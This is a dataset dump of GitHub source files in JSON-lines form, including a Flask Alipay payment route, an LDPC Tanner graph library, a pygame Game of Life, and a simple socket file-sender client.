os.path.basename(__file__))\n\n\ncompanies = [\"msft\", \"ko\", \"mcd\", \"ssnlf\", \"nflx\", \"nke\", \"tsla\", \"compq\", \"spx\", \"djia\", \"the\"]\n#companies = [\"msft\"]\n\n\ntotal_req = 1\n\nfor company in companies:\n total_req = run_collect(company, total_req)\n logger.info(company + \" finished\")\n\n\nlogger.info(\"ending \" + os.path.basename(__file__))\n# end\n###################\n\n\n\n","repo_name":"bromjiri/Presto","sub_path":"crawler/server/stwits-all.py","file_name":"stwits-all.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73810457124","text":"\r\n\r\na = [5, 5, 1, 3, 4, 2, 1]\r\n'''\r\n미션 : 리스트의 절사평균을 구하시오.\r\n- 절사평균이란 최소값과 최대값을 제외한 나머지값들의 평균\r\n-리스트의 합: sum(리스트명) 예)print(sum(a))\r\n- 단, 어떠한 리스트가 주어져도 수행될 수 있어야 함\r\n\r\n'''\r\na = [5, 5, 1, 3, 4, 2, 1]\r\na.sort()\r\ndel a[0]\r\na.pop()\r\nprint(sum(a)/len(a))\r\n\r\n#B)\r\nprint(min(a))\r\nprint(max(a))\r\na.remove(min(a))\r\na.remove(max(a))\r\nprint(sum(a)/len(a))\r\n\r\n\r\n\r\n","repo_name":"jangsejong/STUDY","sub_path":"비트캠프/03 리스트/리스트절사평균.py","file_name":"리스트절사평균.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27033089124","text":"from django.core.management.base import BaseCommand, CommandError\nimport random\nimport math\nimport pprint\nfrom ...models import Document, Sentence, Step\nfrom ...natural_selection import get_work_routing_info, change_populations\n\nclass Command(BaseCommand):\n help = \"\"\n\n def add_arguments(self, parser):\n parser.add_argument('--docid', action='store_true')\n parser.add_argument('--users', action='store_true')\n parser.add_argument('--nostop', action='store_true')\n pass\n\n def get_docid(self, options):\n if not options['docid']:\n docid = max([d.id for d in Document.objects.all()])\n else:\n docid = options['docid']\n return docid\n\n def get_users(self, options):\n if not options['users']:\n users = 20\n else:\n users = options['users']\n return users\n\n def handle(self, *args, **options):\n\n docid = self.get_docid(options)\n users = self.get_users(options)\n\n test_steps_start = Document.objects.get(id=docid).last_valid_step_id\n sample_step_id = test_steps_start\n\n print(\"deleted steps id larger than {}\".format(test_steps_start))\n Step.objects.filter(id__gt=test_steps_start).delete()\n initial_step = Step.objects.get(id=sample_step_id)\n\n ordinal = lambda n: \"%d%s\" % (n, \"tsnrhtdd\"[(math.floor(n / 10) % 10 != 1) * (n % 10 < 4) * n % 10::4])\n\n for i in range(1, users + 1):\n\n current_step = initial_step\n trials = random.randint(1, 5)\n print('--------------------------------')\n print('{} user will make {} Steps at maximum'.format(ordinal(i), trials))\n\n for _ in range(trials):\n\n next_action = get_work_routing_info(current_step.id)\n creatable = next_action['creatable']\n votable = next_action['votable']\n pprint.pprint(next_action)\n next_stage = next_action['next_stage']\n\n new_step = None\n if creatable:\n new_step = Step.objects.create(\n stage=next_stage,\n result=[str(i), str(i)],\n sentence_id=current_step.sentence_id,\n parent_step=current_step\n )\n new_step.save()\n next_action[\"step_list\"] = [new_step] + next_action[\"step_list\"]\n print('\\tcreating step(id={}) at {} stage'.format(new_step.id, next_stage))\n\n winner = None\n if votable:\n step_list = next_action[\"step_list\"]\n rest_list = step_list[2:]\n\n # privilege\n winner = random.choice([step_list[0]] + step_list[:2])\n winner.do_vote()\n\n while len(rest_list) > 0:\n winner = random.choice([winner, rest_list[0]])\n rest_list = rest_list[1:]\n\n print('\\tvoting w/ {} candidates. winner is {}'.format(len(step_list), winner.id))\n\n current_step = winner or new_step\n\n # current step is 4\n if not creatable and not votable:\n break\n\n # Change populations of next generation\n print('\\tchange population of {} stage'.format(next_stage))\n change_populations(next_stage)\n\n if not options['nostop']:\n input('\\tenter any key to proceed\\n')\n\n","repo_name":"dongkwan-kim/dike","sub_path":"dike/webdike/management/commands/test_selection.py","file_name":"test_selection.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10689865007","text":"from . import api\nfrom ihome import db\nfrom ihome.utils.commons import login_required\nfrom ihome.models import Order\nfrom flask import g, current_app, jsonify, request\nfrom ihome.utils.response_code import RET\nfrom alipay import AliPay\nimport os\nfrom ihome import constants\nimport json\n\n\n@api.route('/orders/<int:order_id>/payment', methods=['POST'])\n@login_required\ndef order_pay(order_id):\n '''发起支付宝支付'''\n user_id = g.user_id\n # 判断订单状态\n try:\n order = Order.query.filter(Order.id == order_id, Order.user_id == user_id, Order.status == 'WAIT_PAYMENT').first()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg='数据库异常')\n\n if order is None:\n return jsonify(errno=RET.NODATA, errmsg='订单数据有误')\n\n app_private_key_string = open(os.path.join(os.path.dirname(__file__), 'keys/app_private_key.pem')).read()\n alipay_public_key_string = open(os.path.join(os.path.dirname(__file__), 'keys/alipay_public_key.pem')).read()\n # 创建支付宝的SDK工具对象\n alipay = AliPay(\n appid=\"2021000118643231\",\n app_notify_url=None, # the default notify path\n app_private_key_string=app_private_key_string,\n # alipay public key, do not use your own public key!\n alipay_public_key_string=alipay_public_key_string,\n sign_type=\"RSA2\", # RSA or RSA2\n debug=True, # False by default\n # config=AliPayConfig(timeout=15) # optional, request timeout\n )\n\n order_string = alipay.api_alipay_trade_wap_pay(\n out_trade_no=order.id, # 订单编号\n total_amount=str(order.amount/100.0), # 总金额\n subject='爱家 %s' % order.id, # 订单标题\n return_url=\"http://127.0.0.1:5000/payComplete.html\", # 返回的链接地址\n notify_url=None # this is optional\n )\n\n # 构建让用户跳转的支付链接地址\n pay_url = constants.ALIPAY_URL_PREFIX + order_string\n\n return jsonify(errno=RET.OK, errmsg='OK', data={'pay_url':pay_url})\n\n@api.route('/orders/payment', methods=['PUT'])\ndef save_order_payment_result():\n '''保存订单支付结果'''\n alipay_data = request.form.to_dict()\n # sign must be poped out\n # 对支付宝的数据进行分离操作 提取出支付宝的签名参数sign值 和 剩下的其他数据\n signature = alipay_data.pop(\"sign\")\n\n print(json.dumps(alipay_data))\n print(signature)\n\n app_private_key_string = open(os.path.join(os.path.dirname(__file__), 'keys/app_private_key.pem')).read()\n alipay_public_key_string = open(os.path.join(os.path.dirname(__file__), 'keys/alipay_public_key.pem')).read()\n # 创建支付宝的SDK工具对象\n alipay = AliPay(\n appid=\"2021000118643231\",\n app_notify_url=None, # the default notify path\n app_private_key_string=app_private_key_string,\n # alipay public key, do not use your own public key!\n alipay_public_key_string=alipay_public_key_string,\n sign_type=\"RSA2\", # RSA or RSA2\n debug=True, # False by default\n # config=AliPayConfig(timeout=15) # optional, request timeout\n )\n\n # verify\n # 借助工具验证参数的合法性\n # 如果确定参数是支付宝的,返回True,否则返回False\n result = alipay.verify(alipay_data, signature)\n order_id = alipay_data.get('out_trade_no')\n trade_no = alipay_data.get('trade_no')\n if result:\n try:\n Order.query.filter_by(id=order_id).update({'status':'WAIT_COMMENT', 'trade_no':trade_no})\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n db.session.rollback()\n\n return jsonify(errno=RET.OK, errmsg='OK')\n","repo_name":"bql-mystar/Flask-ihome","sub_path":"ihome/api_1_0/pay.py","file_name":"pay.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71996313124","text":"# json2kml.py\n# 2023-06-01 K.OHWADA\n\nimport simplekml\nimport json\nimport urllib.parse\n\nFORMAT_DESCRIPTION = '<![CDATA[<a href=\"{href}\">{name}</a>]]>'\n\n# Document\nDOC_NAME = 'Crown Dependencies'\nDOC_DESC = 'display the Flag at the Coordinates of Islands'\nFILENAME = 'crown_dependencies.kml'\n\n# create kml\nkml = simplekml.Kml()\nkml.document.name = DOC_NAME\nkml.document.description = DOC_DESC\n\nwith open('crown_dependencies_coordinates.json') as f1:\n dic = json.load(f1)\n list_islands = dic['islands']\n#\n\n\n# Placemark\nfor item in list_islands:\n\tisland = item['island']\n\turl_island = item['url_island']\n\turl_flag = item['url_flag']\n\tlat = item['lat']\n\tlon = item['lon']\n\tprint(island)\n\n\tpoint = kml.newpoint(name = island)\n\tpoint.coords = [(lon, lat)]\n\tpoint.style.iconstyle.icon.href = url_flag\n\tpoint.description = FORMAT_DESCRIPTION.format(href=url_island, name=island)\n#\n\nkml.save(FILENAME)\n\n","repo_name":"ohwada/World_Countries","sub_path":"national_flags_gmap/crown_dependencies/python/json2kml.py","file_name":"json2kml.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7175003323","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required\nfrom sqlalchemy import asc, desc\nimport requests\nfrom app.models import User, Subscription, db, Video\n\nuser_routes = Blueprint('users', __name__)\n\n\n@user_routes.route('/')\n@login_required\ndef users():\n users = User.query.all()\n return {\n \"users\": [user.to_dict() for user in users]\n }\n\n\n@user_routes.route('/<int:id>')\n@login_required\ndef user(id):\n user = User.query.get(id)\n return user.to_dict()\n\n\n@user_routes.route('/subscribe', methods=['POST'])\n@login_required\ndef subscribe():\n data = request.json\n subscribe = Subscription(user_id=data['user_id'],\n channel_id=data['channel_id'])\n db.session.add(subscribe)\n db.session.commit()\n return user(data['user_id'])\n\n\n@user_routes.route('/unsubscribe', methods=['DELETE'])\n@login_required\ndef unsubscriptions():\n data = request.json\n subscription = User.query.get(data['user_id'])\n subscription = subscription.get_unsubscription(\n channel_id=data['channel_id'])\n db.session.delete(subscription)\n db.session.commit()\n return user(data['user_id'])\n","repo_name":"joshsomthin/noobtube","sub_path":"app/api/user_routes.py","file_name":"user_routes.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34572524109","text":"\"\"\"\n\nA parent of all LDPC codes included in this library\n\nThis class provides a structure which all LDPC codes can manipulate in their individual constructions.\nThe tanner_graph attribute presents a dictionary where row indices are mapped to lists of column indices.\nThis structure is populated in the respective subclasses. It is a requirement of all subclasses to define\nthe width, height, and tanner_graph attributes of this superclass, as intermediary functions rely on these\nfields to function appropriately\n\nThe Tanner (Bipartite) graph representation describes the same code as the corresponding parity check matrix.\nEach row contained within the structural dictionary describes a row in the corresponding matrix: the key value\nindicates the index of the row in the matrix, and the value list describes the locations of the entries\ncontained in that matrix row. Unlisted values are assumed to be empty and therefore zero in the matrix representation\n\n\"\"\"\n\nimport random\n\n\nclass TannerGraph:\n\n # All subclasses must implement height, width, tanner_graph definitions\n # parameters:\n # args: list, contains any possible arguments a subclass might require for their respective constructions\n # construction: if a subclass implements multiple constructions, this field identifies the construction used by a subclass instance\n # return:\n # a TannerGraph object with the tanner_graph dictionary instantiated empty\n def __init__(self, args, construction=None):\n\n self.args = args\n self.construction = construction\n\n self.width = None\n self.height = None\n\n self.tanner_graph = {}\n\n # parameters:\n # row: int, the row r contained as a key by self.tanner_graph\n # value: int, the value which self.tanner_graph.get(row) must append to itself\n # return:\n # None, appends value internally\n def append(self, row, value):\n self.tanner_graph[row].append(value)\n\n # parameters:\n # row: int, row index to query\n # return:\n # list, the calue associated with the row parameter in self.tanner_graph\n def getRow(self, row):\n return self.tanner_graph[row]\n\n # Adds another row below the existing rows in self.tanner_graph. This corresponds to increasing the number\n # of parity bits and reducing the number of message bits. In this sense, an n/k code is transformed into\n # an n/k-1 code. This row is irrelevant until population, as it is initially empty (corresponding to a row\n # 0s in the matrix representation\n # return:\n # None\n def addRow(self):\n self.tanner_graph[len(self.tanner_graph)] = []\n\n # return:\n # a list of row indices contained in the Graph\n def keys(self):\n return list(self.tanner_graph.keys())\n\n # WARNING: This function performs insertion without warning if data is being overriden\n # parameters:\n # row_index: int, the index of the row to be appended (location along the height of the matrix)\n # row: list, the actual row to insert\n def put(self, row_index, row):\n self.tanner_graph[row_index] = row\n\n # return:\n # the number of rows (either populated or not) described by this Tanner Graph\n def __len__(self):\n return len(self.tanner_graph)\n\n # If Two graphs overlap, it is indicated that both graphs contain one or more entries in the same location.\n # parameters:\n # other: TannerGraph, the comparative graph\n # return:\n # boolean value: indicating if self and other overlap\n def overlaps(self, other):\n\n if len(self.tanner_graph.keys()) <= len(other.keys()):\n smaller = self\n larger = other\n else:\n smaller = other\n larger = self\n\n for i in range(len(smaller)):\n for entry in smaller.getRow(i):\n if entry in larger.getRow(i):\n return True\n\n return False\n\n # Performs an insertion of one smaller TannerGraph into another. This is described more easily in terms of code matrices.\n # Matrix code m can be inserted into matrix code n at location (i, j) if i + m.width < n.width and j + m.height < n.height.\n # Code M would replace all entries and non entries in the scope of rows j -> j + m.height and columns i -> m.width with its\n # own relative entries and non entries\n # parameters:\n # other: TannerGraph, the graph which self must absorb\n # location: list, the [row, col] values at which the insertion is to occur\n # return:\n # None, all changes are made in self internally\n def insert(self, other, location): # location: [row, column]\n\n # clears graph\n for r in range(other.height):\n c = 0\n while c < len(self.tanner_graph[r + location[0]]):\n if location[1] <= self.tanner_graph[r + location[0]][c] < location[1] + other.width:\n self.tanner_graph[r + location[0]].pop(c)\n c -= 1\n\n c += 1\n\n # populates graph\n for r in range(other.height):\n for c in other.tanner_graph[r]:\n if location[1] + c not in self.tanner_graph[location[0] + r]:\n self.tanner_graph[location[0] + r].append(location[1] + c)\n\n # no errors thrown for out of bounds\n\n # Equivalent to the process of summing two code matrices. The summation is performed given the two matrices do not\n # overlap. If one matrix is smaller than the other, the larger matrix will contain all the changes and is returned.\n # The summation in this case will occur in the scope of rows: i -> i + smaller.height, columns: j -> j + smaller.width\n # given location: [i, j]\n # parameters:\n # other: TannerGraph, the second tanner graph involved in the summation\n # location: list [r, c], the coordinates where the summation is to start in the larger graph\n def absorb_nonoverlapping(self, other, location):\n\n if self.overlaps(other):\n print(\"cannot combine matrices, they overlap\")\n return None\n\n if len(self.tanner_graph.keys()) <= len(other.keys()):\n smaller = self\n larger = other\n else:\n smaller = other\n larger = self\n\n for r in range(smaller.height):\n for c in smaller.getRow(r):\n larger.getRow(r + location[0]).append(c + location[1])\n\n return larger\n\n def permute_rows(self, permutation_list=None):\n\n if permutation_list is None:\n permutation_list = random.sample(range(self.height), self.height)\n else:\n if len(permutation_list) != self.height:\n print(\"cannot perform graph row permutation: invalid permutation list\")\n return\n\n for i in range(len(permutation_list)):\n self.swap_rows(i, permutation_list[i])\n\n return None\n\n # swaps two rows given row indices\n def swap_rows(self, i, j):\n temp = self.tanner_graph[i]\n self.tanner_graph[i] = self.tanner_graph[j].copy()\n self.tanner_graph[j] = temp\n\n # randomly shuffles the columns of the code\n def permute_columns(self, permutation_list=None):\n\n if permutation_list is None:\n permutation_list = random.sample(range(self.width), self.width)\n else:\n if len(permutation_list) != self.width:\n raise RuntimeError(\"cannot perform graph row permutation: invalid permutation list\")\n\n # we first transpose the graph and then permute the rows and then transpose again\n self.tanner_graph = transpose(self.tanner_graph, self.width)\n self.height, self.width = self.width, self.height\n self.permute_rows(permutation_list)\n\n self.tanner_graph = transpose(self.tanner_graph, self.width)\n self.height, self.width = self.width, self.height\n\n # swaps two columns given column indices\n def swap_columns(self, i, j):\n for row in self.tanner_graph:\n for e in range(len(self.getRow(row))):\n if self.getRow(row)[e] == i:\n self.tanner_graph[row][e] = j\n elif self.getRow(row)[e] == j:\n self.tanner_graph[row][e] = i\n\n # return:\n # returns the matrix representation of this TannerGraph instance\n def as_matrix(self):\n return get_matrix_representation(self.tanner_graph)\n\n\n# parameters:\n# row: int, number of rows to initializes in this Tanner Graph\n# width: int, width of Graph\n# height: int, height of Graph\n# return:\n# Empty Tanner Graph instantiation with width, height attributes defined\ndef make_graph(rows, width, height):\n graph = TannerGraph(None)\n\n graph.width = width\n graph.height = height\n\n for i in range(rows):\n graph.addRow()\n\n return graph\n\n\n'''\nTraverses the dictionary to find identical key values. These correspond to repeated parity check equations which\ncould undermine the code's performance.\n'''\n\n\n# parameters:\n# tanner_graph: TannerGraph.tanner_graph dictionary\n# returns:\n# boolean indicating whether or not the dict contains repeated list values\ndef has_repeated_rows(tanner_graph):\n for i in range(0, len(tanner_graph) - 1):\n for j in range(i + 1, len(tanner_graph)):\n if tanner_graph[i] == tanner_graph[j]:\n print(\"row \" + str(i) + \" and row \" + str(j) + \" are identical\")\n return True\n return False\n\n\n'''\nThe equivalent of transposing a matrix, if that matrix were represented by a bipartite graph. This allows for more\ndiverse methods of matrix construction.\n'''\n\n\n# parameters:\n# tanner_graph: Tanner.tanner_graph dictionary, the graph to be transposed\n# returns:\n# TannerGraph.tanner_graph attribute representing the transposed dictionary\ndef transpose(tanner_graph, new_height):\n new_graph = {i: [] for i in range(new_height)}\n for row in tanner_graph:\n for col in tanner_graph[row]:\n new_graph[col].append(row)\n return new_graph\n\n\n'''\nBecause this program stores ldpc parity information in the form of tanner graphs, this provides a way to construct\nthe appropriate matrix provided the tanner graph\n'''\n\n\n# parameters:\n# tanner_graph: Tanner.tanner_graph dictionary, the dict object for which a representation must be made\n# returns:\n# matrix, list(list()) where 1s represent entries and 0s represent lack of thereof\ndef get_matrix_representation(tanner_graph):\n matrix = []\n for i in range(len(tanner_graph)):\n row = []\n if i in tanner_graph:\n for j in range(max(tanner_graph[i]) + 1):\n if j in tanner_graph[i]:\n row.append(1)\n else:\n row.append(0)\n matrix.append(row)\n normalize(matrix)\n return matrix\n\n\n'''\nBecause only rows are directly indexed in the first level of the tanner_graph, the width of a tanner_graph dict\nis not inherently directly stored anywhere. The dictionary's lists must be traversed to find the maximum index.\nThe max + 1 indicates the width of the tanner_graph\n'''\n\n\n# parameters:\n# tanner_graph: Tanner.tanner_graph dictionary of which the width must be found\n# return:\n# int, width of the tanner_graph\ndef get_width(tanner_graph):\n max = 0\n for row in tanner_graph:\n for index in tanner_graph[row]:\n if index > max:\n max = index\n return max + 1\n\n\n'''\nPerforms a circular right shift of all elements in a given list\n'''\n\n\n# parameters:\n# row: list, a list to be right shifted. This list is commonly a row of a TannerGraph in library implementations\n# width: int, the cap to the right-shift. If the width is surpassed by any element, that element is reset to 0\ndef right_shift_row(row, width):\n for i in range(len(row)):\n if row[i] == width - 1:\n row[i] = 0\n else:\n row[i] += 1\n\n\n'''\nGiven a list of lists, this method normalizes all sublists to the same size by populating smaller sublists with 0s.\nThis method is intended to normalize matrix representations for aesthetic purposes\n'''\n\n\n# parameters:\n# arr: list(list()), array to be normalized\n# return:\n# list(list()) normalized 2d list\ndef normalize(arr):\n new_length = largest_row(arr)\n for i in range(len(arr)):\n arr[i] = arr[i] + [0] * (new_length - len(arr[i]))\n\n\n'''\nIteratively finds the length of the longest sublist contained in a list of lists.\n'''\n\n\n# parameters:\n# arr: list, list to be queried\n# return:\n# int, length of larges sublist in an array\ndef largest_row(arr):\n largest = 0\n for row in arr:\n if len(row) > largest:\n largest = len(row)\n return largest\n\n\n'''\nanalyzes a given code with a few print statements\n'''\n\n\n# parameters:\n# TannerGraph, graph to be analyzed\n# printCode, whether to display the entire code (suitable only for small matrices)\ndef analyze(code, printCode=False):\n print()\n print(\"arguments: \" + str(code.args))\n print(\"code construction: \" + code.construction)\n\n matrix = code.as_matrix()\n\n if printCode:\n print(\"code as graph\")\n print(code.tanner_graph)\n\n print(\"code as matrix: \")\n for line in matrix:\n print(line)\n\n row_weights = []\n for line in matrix:\n row_weights.append(line.count(1))\n\n col_weights = []\n for c in range(len(matrix[0])):\n\n col_weight = 0\n for r in range(len(matrix)):\n if matrix[r][c] == 1:\n col_weight += 1\n\n col_weights.append(col_weight)\n\n row_weights = list(dict.fromkeys(row_weights))\n col_weights = list(dict.fromkeys(col_weights))\n\n print(\"row weights: \" + str(row_weights))\n print(\"col weights: \" + str(col_weights))\n\n print(\"width: \" + str(code.width))\n print(\"height: \" + str(code.height))\n print()\n\n\n'''\nDisplays a TannerGraph object in matrix form\n'''\n\n\n# parameters:\n# graph: TannerGraph\ndef printm(graph):\n m = graph.as_matrix()\n for line in m:\n print(line)\n","repo_name":"shubhamchandak94/ProtographLDPC","sub_path":"LDPC-library/libs/TannerGraph.py","file_name":"TannerGraph.py","file_ext":"py","file_size_in_byte":14009,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"30406139304","text":"import numpy as np\n\nfrom constants import TIMESTEPS, UPSAMPLE\n\n# There are two options of reduction for the da vector:\n# ss - sum of squares\n# sa - sum of absolutes\n\n\nclass TimeLagFeature(object):\n \"\"\"\n This feature calculates the time difference between the main channel and all other channels in terms of\n maximal depolarization, and the following after hyperpolarization.\n The feature only takes into consideration channels that have crossed a certain threshold, determined by the\n maximal depolarization of the main channel.\n \"\"\"\n\n def __init__(self, ratio=0.25, data_name='dep'):\n # Indicates the percentage of the maximum depolarization that will be considered as a threshold\n self.ratio = ratio\n\n self.name = 'Time-lag'\n self.data = data_name\n\n def set_data(self, new_data):\n self.data = new_data\n\n def calculate_feature(self, spike_lst, amps):\n \"\"\"\n inputs:\n spike_lst: A list of Spike object that the feature will be calculated upon.\n\n returns:\n A matrix in which entry (i, j) refers to the j metric of Spike number i.\n \"\"\"\n result = [self.calc_feature_spike(spike.get_data(), amp) for spike, amp in zip(spike_lst, amps)]\n result = np.asarray(result)\n return result\n\n def calc_feature_spike(self, spike, amp):\n \"\"\"\n inputs:\n spike: the spike to be processed; it is a matrix with the dimensions of (NUM_CHANNELS, TIMESTEPS * UPSAMPLE)\n\n The function calculates different time lag features of the spike\n\n returns: a list containing the following values:\n -red: the reduction of the depolarization vector (i.e\n the vector that indicates the time difference of maximal depolarization between each channel and the main\n channel)\n -sd: the standard deviation of the depolarization vector\n \"\"\"\n # remove channels with lower amplitude than required\n max_amp = np.max(amp)\n fix_inds = amp >= self.ratio * max_amp\n amp = amp[fix_inds]\n spike = spike[fix_inds]\n\n # find timestamps for the event in ok channels, filter again to assure the event is reached before the end\n ind = np.argmin(spike, axis=1)\n # if event is reached at the end, it indicates noise\n fix_inds = ind < (TIMESTEPS * UPSAMPLE - 1)\n amp = amp[fix_inds]\n ind = ind[fix_inds]\n spike = spike[fix_inds]\n if spike.shape[0] <= 1: # if no channel passes filtering return zeros (or if only one channel)\n return [0, 0]\n\n # offset according to the main channel\n # set main channel to be the one with highest t2p\n main_chn = amp.argmax()\n rel = ind - ind[main_chn] # offsetting\n\n # calculate sd of event time differences\n sd = np.std(rel)\n\n # calculate reduction\n red = np.mean(rel ** 2)\n\n return [red, sd]\n\n @property\n def headers(self):\n \"\"\"\n Returns a list of titles of the different metrics\n \"\"\"\n return [f\"{self.data}_{self.name}_SS\", f\"{self.data}_{self.name}_SD\"]\n","repo_name":"EranStarkLab/SpatiotemporalSpiking","sub_path":"src/features/spatial_features/FET_time_lag.py","file_name":"FET_time_lag.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11910968810","text":"\"\"\"\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2021/4/23 0023 17:14\r\n# @Author : 源来很巧\r\n# @FileName: 康为生命游戏2.py\r\n# @Software: PyCharm\r\n# @Blog :https://blog.csdn.net/qq_44793283\r\n\"\"\"\r\nimport sys\r\nimport random\r\nimport numpy as np\r\nimport pygame\r\npygame.init()#初始化init()及设置\r\nn=int(input(\"请输入阶数:\"))\r\nsize=width,height=50*n+2,50*n+2\r\nscreen=pygame.display.set_mode(size)#窗口大小\r\npygame.display.set_caption(\"康威生命游戏\")#窗口名字\r\nicon=pygame.image.load(\"Icon.jpg\")\r\npygame.display.set_icon(icon)\r\nBLACK=pygame.Color(\"black\")\r\nGAINSBORO=pygame.Color(\"gainsboro\")\r\nMOCCASIN=pygame.Color(\"moccasin\")\r\nWHITE=pygame.Color(\"white\")\r\nscreen.fill(MOCCASIN)\r\nfps=1\r\nfclock=pygame.time.Clock()#创建一个Clock对象用于操作时间\r\n\r\n\r\n## 生成初始生命\r\na=[]\r\nfor i in range(0,n):\r\n a.append([])\r\n for j in range(0,n):\r\n a[i].append(random.randint(0,1))\r\n\r\n## 八个方位的索引变化\r\ndirection = [[-1, -1], [0, -1], [1, -1], [1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0]]\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT: # 点击了退出\r\n sys.exit() # 退出\r\n c = []\r\n # 计算周围生命个数\r\n for i in range(0, n):\r\n c.append([])\r\n for j in range(0, n):\r\n count = 0 # 每一个方格\r\n for o in direction:\r\n ide = np.array([i, j]) + np.array(o)\r\n # 保证判断的位置在范围内,针对边界方格\r\n if 0 <= ide[0] < n and 0 <= ide[1] < n:\r\n if a[ide[0]][ide[1]] == 1:\r\n count += 1\r\n c[i].append(count)\r\n ## 按照生命的发展规律进行新一轮的生面变化\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n if c[i][j] <= 1 or c[i][j] >= 4:#当生命稀少或者过多时生命死亡\r\n a[i][j] = 0\r\n elif c[i][j] == 3:#当生命的周围有三个生命时,生成新生命\r\n a[i][j] = 1\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n if a[i][j]==1:\r\n #先画一个满填充的方格,有生命方格\r\n pygame.draw.rect(screen, BLACK, (i*50, j*50, 50, 50))\r\n #再画一个不填充,框线为2的方格,套在上面的方格上面\r\n pygame.draw.rect(screen, GAINSBORO, (i*50, j*50, 50, 50),2)\r\n\r\n else:#无生命方格\r\n pygame.draw.rect(screen, WHITE, (i*50, j*50, 50, 50))\r\n pygame.draw.rect(screen, GAINSBORO, (i*50, j*50, 50, 50),2)\r\n print(np.array(a))\r\n pygame.display.update() # 对显示窗口进行更新,默认窗口全部重绘\r\n fclock.tick(fps) # 窗口刷新速度,每秒3次\r\n\r\n\r\n","repo_name":"Lance-Owen/ConwayGame","sub_path":"康为生命游戏2.py","file_name":"康为生命游戏2.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71813450084","text":"import retailitems_class\r\nclass register():\r\n def __init__(self):\r\n self.register_list = []\r\n def getlistitems(self):\r\n return self.register_list\r\n def purchase_items(self, object_added):\r\n self.register_list.append(object_added)\r\n def get_total(self,object_added):\r\n self.total = 0\r\n self.total += object_added.getprices()\r\n return self.total\r\n def clear_items(self):\r\n self.register_list.clear()\r\n\r\n\r\ndef main():\r\n #create object'shirt','20','24.95\r\n obj = retailitems_class.retail('shirt','20',10)\r\n obj1 = retailitems_class.retail('Jacket','10',100)\r\n obj2 = retailitems_class.retail('Jeans','10',24.95)\r\n register_object =register()\r\n register_object.purchase_items(obj)\r\n register_object.purchase_items(obj1)\r\n register_object.purchase_items(obj2)\r\n array = register_object.getlistitems()\r\n for i in array:\r\n print(\"\")\r\n print(i)\r\n print(\"----------------\")\r\n t=register_object.get_total(obj)\r\n r=register_object.get_total(obj1)\r\n l=register_object.get_total(obj2)\r\n print(\"Total:\"+ str(t+r+l))\r\n\r\n\r\n\r\n\r\n\r\nmain()\r\n","repo_name":"ericramos92/OOP","sub_path":"Project_8/cash_register.py","file_name":"cash_register.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17901141511","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# =============================\n# Author\t--> devMen\n# Date created\t--> 01/04/2021\n# Last modified\t--> 05/04/2021\n# Version\t--> Python 3.8.5\n# =============================\n\"\"\"\n\t|Python File Sender|\nprograma simple para enviar archivos\n\"\"\"\n# =============================\n# Imports\nimport socket\nimport sys\nimport time\nimport argparse\n\n# =============================\n\ndef banner():\n\treturn \"\"\"\n ___ ___ ___ _ \n | _ \\_ _/ __| ___| __(_)\n | _/ || \\__ \\/ -_) _|| |\n |_| \\_, |___/\\___|_| |_|\n |__/ \n===> by ☆ developmentMen☆\n \"\"\"\n\ndef enviar(s, filename):\n\ts.send(filename.encode())\n\ttime.sleep(1)\n\tfile = open(filename, 'rb')\n\twhile True:\n\t\tstrng = file.readline(512)\n\t\tif not strng:\n\t\t\tbreak\n\t\ts.send(strng)\n\tfile.close()\n\tprint(\"archivo enviado con exito\")\n\ndef main():\n\ts = socket.socket()\n\ts.connect((args.ipAddress, args.port))\n\tenviar(s, args.file)\n\n\ts.close()\n\n\nif __name__=='__main__':\n\targumentos = argparse.ArgumentParser(\n\t\tdescription=\"Python file sender\")\n\tg = argumentos.add_mutually_exclusive_group()\n\tg.add_argument('-nb', '--noBanner', action='store_true',\n\t\thelp=\"no print banner\")\n\targumentos.add_argument(\n\t\t'-i', '--ipAddress', type=str, required=True, metavar=\"\",\n\t\thelp=\"ip PySeFi Server\")\n\targumentos.add_argument(\n\t\t'-p', '--port', type=int, metavar='',\n\t\tdefault=6333, help='Port 1024 to 65535 -> default=6333')\n\targumentos.add_argument(\n\t\t'-f', '--file', type=str, required=True, metavar=\"\",\n\t\thelp=\"file to send\")\n\targs = argumentos.parse_args()\n\n\tif not args.noBanner: print(banner())\n\ttry:\n\t \tmain()\n\texcept Exception as 